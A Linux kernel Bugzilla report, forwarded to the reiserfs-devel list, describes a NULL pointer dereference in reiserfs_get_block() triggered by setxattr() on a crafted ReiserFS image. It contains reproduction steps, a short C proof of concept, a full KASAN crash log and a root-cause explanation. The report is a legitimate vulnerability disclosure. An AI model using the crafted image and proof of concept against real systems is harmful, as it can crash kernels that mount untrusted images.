https://bugzilla.kernel.org/show_bug.cgi?id=200357 Bug ID: 200357 Summary: nullptr dereference in reiserfs_get_block() when calling setxattr() on a file in a reiserfs image Product: File System Version: 2.5 Kernel Version: 4.18 Hardware: All OS: Linux Tree: Mainline Status: NEW Severity: normal Priority: P1 Component: ReiserFS Assignee: reiserfs-devel@xxxxxxxxxxxxxxx Reporter: wen.xu@xxxxxxxxxx Regression: No Created attachment 277011 --> https://bugzilla.kernel.org/attachment.cgi?id=277011&action=edit The (compressed) crafted image which causes crash - Reproduce (4.18) # mkdir mnt # mount -t reiserfs -o acl,user_xattr 254.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *xattr; int err; err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint); // xattr char buf2[113]; memset(buf2, 0, sizeof(buf2)); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE); } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 222.219838] REISERFS (device loop0): found reiserfs format "3.6" with standard journal [ 222.219960] REISERFS (device loop0): using ordered data mode [ 222.219973] reiserfs: using flush barriers [ 222.221188] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 [ 222.222249] REISERFS (device loop0): checking transaction log (loop0) [ 223.239558] REISERFS (device loop0): Using r5 hash to sort names [ 223.239924] REISERFS (device loop0): Created .reiserfs_priv - reserved for xattr storage. [ 233.095836] ================================================================== [ 233.097426] BUG: KASAN: null-ptr-deref in reiserfs_get_block+0x8ca/0x1c40 [ 233.098817] Write of size 4 at addr 000000000000000c by task a.out/1363 [ 233.100495] CPU: 0 PID: 1363 Comm: a.out Not tainted 4.18.0-rc1+ #8 [ 233.100507] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 233.100516] Call Trace: [ 233.100536] dump_stack+0x7b/0xb5 [ 233.100549] kasan_report+0x10c/0x390 [ 233.100554] ? reiserfs_get_block+0x8ca/0x1c40 [ 233.100563] __asan_store4+0x7b/0x80 [ 233.100567] reiserfs_get_block+0x8ca/0x1c40 [ 233.100574] ? reiserfs_commit_write+0x390/0x390 [ 233.100577] ? kasan_kmalloc+0xad/0xe0 [ 233.100584] ? memcg_kmem_put_cache+0x1b/0xa0 [ 233.100589] ? kmem_cache_alloc+0x17c/0x1e0 [ 233.100597] ? alloc_buffer_head+0x20/0x70 [ 233.100603] ? create_empty_buffers+0x17e/0x1d0 [ 233.100607] ? memset+0x31/0x40 [ 233.100619] ? unlock_page+0x16/0x40 [ 233.100624] ? block_read_full_page+0x28f/0x4d0 [ 233.100628] ? reiserfs_commit_write+0x390/0x390 [ 233.100636] ? mark_page_accessed+0x133/0x200 [ 233.100640] __block_write_begin_int+0x296/0x940 [ 233.100644] ? __block_write_begin_int+0x296/0x940 [ 233.100649] ? reiserfs_commit_write+0x390/0x390 [ 233.100654] ? __breadahead+0xd0/0xd0 [ 233.100665] ? mutex_lock+0x99/0xf0 [ 233.100670] ? __mutex_lock_slowpath+0x20/0x20 [ 233.100675] ? kasan_check_write+0x14/0x20 [ 233.100680] __block_write_begin+0x11/0x20 [ 233.100684] __reiserfs_write_begin+0x162/0x2a0 [ 233.100694] reiserfs_xattr_set_handle+0x283/0x610 [ 233.100699] ? reiserfs_chown_xattrs+0x60/0x60 [ 233.100704] ? kasan_check_read+0x11/0x20 [ 233.100708] ? mutex_lock+0x99/0xf0 [ 233.100712] ? __mutex_lock_slowpath+0x20/0x20 [ 233.100725] ? do_syscall_64+0x78/0x170 [ 233.100731] ? kasan_check_write+0x14/0x20 [ 233.100736] reiserfs_xattr_set+0x1f8/0x2f0 [ 233.100741] ? reiserfs_xattr_set_handle+0x610/0x610 [ 233.100748] ? strlen+0x25/0x40 [ 233.100752] user_set+0x83/0xa0 [ 233.100758] __vfs_setxattr+0x7c/0xa0 [ 233.100763] __vfs_setxattr_noperm+0x8d/0x200 [ 233.100768] vfs_setxattr+0xb3/0xc0 [ 233.100772] setxattr+0x1b3/0x260 [ 233.100776] ? vfs_setxattr+0xc0/0xc0 [ 233.100781] ? filename_lookup+0x191/0x280 [ 233.100785] ? filename_parentat+0x2b0/0x2b0 [ 233.100790] ? kasan_kmalloc+0xad/0xe0 [ 233.100795] ? kasan_check_write+0x14/0x20 [ 233.100807] ? strncpy_from_user+0xa8/0x1c0 [ 233.100815] ? __mnt_is_readonly.part.13+0x23/0x30 [ 233.100820] ? __mnt_want_write+0x9d/0xb0 [ 233.100824] path_setxattr+0x134/0x170 [ 233.100829] ? setxattr+0x260/0x260 [ 233.100834] ? vm_brk+0x20/0x20 [ 233.100839] __x64_sys_setxattr+0x6d/0x80 [ 233.100844] do_syscall_64+0x78/0x170 [ 233.100851] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 233.100868] RIP: 0033:0x7fba989c81fa [ 233.100870] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 233.100932] RSP: 002b:00007fffa6feac58 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 233.100937] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fba989c81fa [ 233.100940] RDX: 00007fffa6feac80 RSI: 00000000004007a5 RDI: 000000000257a080 [ 233.100942] RBP: 00007fffa6fead00 R08: 0000000000000001 R09: 0000000000000000 [ 233.100945] R10: 0000000000000071 R11: 0000000000000202 R12: 0000000000400550 [ 233.100947] R13: 00007fffa6feae00 R14: 0000000000000000 R15: 0000000000000000 [ 233.100952] ================================================================== [ 233.102525] Disabling lock debugging due to kernel taint [ 233.103135] BUG: unable to handle kernel NULL pointer dereference at 000000000000000c [ 233.104712] PGD 80000001f3a5b067 P4D 80000001f3a5b067 PUD 1f02cb067 PMD 0 [ 233.106096] Oops: 0002 [#1] SMP KASAN PTI [ 233.106910] CPU: 0 PID: 1363 Comm: a.out Tainted: G B 4.18.0-rc1+ #8 [ 233.108426] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 233.110308] RIP: 0010:reiserfs_get_block+0x8d1/0x1c40 [ 233.111308] Code: 00 00 48 3b 9d f8 fc ff ff 0f 87 df 06 00 00 4d 8d 6c 9c fc 44 8b bd 50 fd ff ff 4c 89 ef e8 36 9b eb ff 48 8b bd 28 fd ff ff <45> 89 7d 00 e8 a6 9b eb ff 48 8b bd 20 fd ff ff 4d 8b 6e 28 e8 96 [ 233.115052] RSP: 0018:ffff8801efca73a0 EFLAGS: 00010296 [ 233.116097] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000 [ 233.117519] RDX: 0000000000000000 RSI: 0000000000000297 RDI: ffff8801d06d9608 [ 233.118925] RBP: ffff8801efca7720 R08: ffffed003edc3ebb R09: ffffed003edc3ebb [ 233.120334] R10: 0000000000000001 R11: ffffed003edc3eba R12: 0000000000000010 [ 233.121758] R13: 000000000000000c R14: ffff8801d06d95e0 R15: 0000000000002910 [ 233.123162] FS: 00007fba98ea7700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 233.124750] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 233.125898] CR2: 000000000000000c CR3: 00000001f029a000 CR4: 00000000000006f0 [ 233.127310] Call Trace: [ 233.127825] ? reiserfs_commit_write+0x390/0x390 [ 233.128751] ? kasan_kmalloc+0xad/0xe0 [ 233.129517] ? memcg_kmem_put_cache+0x1b/0xa0 [ 233.130390] ? kmem_cache_alloc+0x17c/0x1e0 [ 233.131234] ? alloc_buffer_head+0x20/0x70 [ 233.132066] ? create_empty_buffers+0x17e/0x1d0 [ 233.132977] ? memset+0x31/0x40 [ 233.133632] ? unlock_page+0x16/0x40 [ 233.134355] ? block_read_full_page+0x28f/0x4d0 [ 233.135264] ? reiserfs_commit_write+0x390/0x390 [ 233.136194] ? mark_page_accessed+0x133/0x200 [ 233.137072] __block_write_begin_int+0x296/0x940 [ 233.138015] ? __block_write_begin_int+0x296/0x940 [ 233.138982] ? reiserfs_commit_write+0x390/0x390 [ 233.139907] ? __breadahead+0xd0/0xd0 [ 233.140646] ? mutex_lock+0x99/0xf0 [ 233.141352] ? __mutex_lock_slowpath+0x20/0x20 [ 233.142257] ? kasan_check_write+0x14/0x20 [ 233.143081] __block_write_begin+0x11/0x20 [ 233.143904] __reiserfs_write_begin+0x162/0x2a0 [ 233.144813] reiserfs_xattr_set_handle+0x283/0x610 [ 233.145788] ? reiserfs_chown_xattrs+0x60/0x60 [ 233.146678] ? kasan_check_read+0x11/0x20 [ 233.147485] ? mutex_lock+0x99/0xf0 [ 233.148192] ? __mutex_lock_slowpath+0x20/0x20 [ 233.149084] ? do_syscall_64+0x78/0x170 [ 233.149871] ? kasan_check_write+0x14/0x20 [ 233.150696] reiserfs_xattr_set+0x1f8/0x2f0 [ 233.151541] ? reiserfs_xattr_set_handle+0x610/0x610 [ 233.152538] ? strlen+0x25/0x40 [ 233.153179] user_set+0x83/0xa0 [ 233.153830] __vfs_setxattr+0x7c/0xa0 [ 233.154570] __vfs_setxattr_noperm+0x8d/0x200 [ 233.155443] vfs_setxattr+0xb3/0xc0 [ 233.156148] setxattr+0x1b3/0x260 [ 233.156820] ? vfs_setxattr+0xc0/0xc0 [ 233.157570] ? filename_lookup+0x191/0x280 [ 233.158390] ? filename_parentat+0x2b0/0x2b0 [ 233.159249] ? kasan_kmalloc+0xad/0xe0 [ 233.160005] ? kasan_check_write+0x14/0x20 [ 233.160831] ? strncpy_from_user+0xa8/0x1c0 [ 233.161689] ? __mnt_is_readonly.part.13+0x23/0x30 [ 233.162649] ? __mnt_want_write+0x9d/0xb0 [ 233.163458] path_setxattr+0x134/0x170 [ 233.164219] ? setxattr+0x260/0x260 [ 233.164924] ? vm_brk+0x20/0x20 [ 233.165579] __x64_sys_setxattr+0x6d/0x80 [ 233.166393] do_syscall_64+0x78/0x170 [ 233.167133] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 233.168137] RIP: 0033:0x7fba989c81fa [ 233.168855] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 233.172610] RSP: 002b:00007fffa6feac58 EFLAGS: 00000202 ORIG_RAX: 00000000000000bc [ 233.174125] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fba989c81fa [ 233.175542] RDX: 00007fffa6feac80 RSI: 00000000004007a5 RDI: 000000000257a080 [ 233.176957] RBP: 00007fffa6fead00 R08: 0000000000000001 R09: 0000000000000000 [ 233.178376] R10: 0000000000000071 R11: 0000000000000202 R12: 0000000000400550 [ 233.179786] R13: 00007fffa6feae00 R14: 0000000000000000 R15: 0000000000000000 [ 233.181196] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 233.190821] CR2: 000000000000000c [ 233.191568] ---[ end trace 2e85051acb5f6dc1 ]--- [ 233.192549] RIP: 0010:reiserfs_get_block+0x8d1/0x1c40 [ 233.193590] Code: 00 00 48 3b 9d f8 fc ff ff 0f 87 df 06 00 00 4d 8d 6c 9c fc 44 8b bd 50 fd ff ff 4c 89 ef e8 36 9b eb ff 48 8b bd 28 fd ff ff <45> 89 7d 00 e8 a6 9b eb ff 48 8b bd 20 fd ff ff 4d 8b 6e 28 e8 96 [ 233.197452] RSP: 0018:ffff8801efca73a0 EFLAGS: 00010296 [ 233.198563] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000 [ 233.200142] RDX: 0000000000000000 RSI: 0000000000000297 RDI: ffff8801d06d9608 [ 233.201590] RBP: ffff8801efca7720 R08: ffffed003edc3ebb R09: ffffed003edc3ebb [ 233.203362] R10: 0000000000000001 R11: ffffed003edc3eba R12: 0000000000000010 [ 233.204873] R13: 000000000000000c R14: ffff8801d06d95e0 R15: 0000000000002910 [ 233.206338] FS: 00007fba98ea7700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 233.207957] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 233.209154] CR2: 000000000000000c CR3: 00000001f029a000 CR4: 00000000000006f0 - Reason https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/inode.c#L1047 if (blocks_needed == 1) { un = &unf_single; } else { un = kcalloc(min(blocks_needed, max_to_insert), UNFM_P_SIZE, GFP_NOFS); if (!un) { un = &unf_single; blocks_needed = 1; max_to_insert = 0; } } if (blocks_needed <= max_to_insert) { /* * we are going to add target block to * the file. Use allocated block for that */ un[blocks_needed - 1] = cpu_to_le32(allocated_block_nr); Since the `size` of kcalloc can be 0, and un will be 0x10. Later kernel panics at `un[blocks_needed - 1]`. Reported by Wen Xu (wen.xu@xxxxxxxxxx) from SSLab at Gatech. -- You are receiving this mail because: You are the assignee for the bug.-- To unsubscribe from this list: send the line "unsubscribe reiserfs-devel" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at http://vger.kernel.org/majordomo-info.html
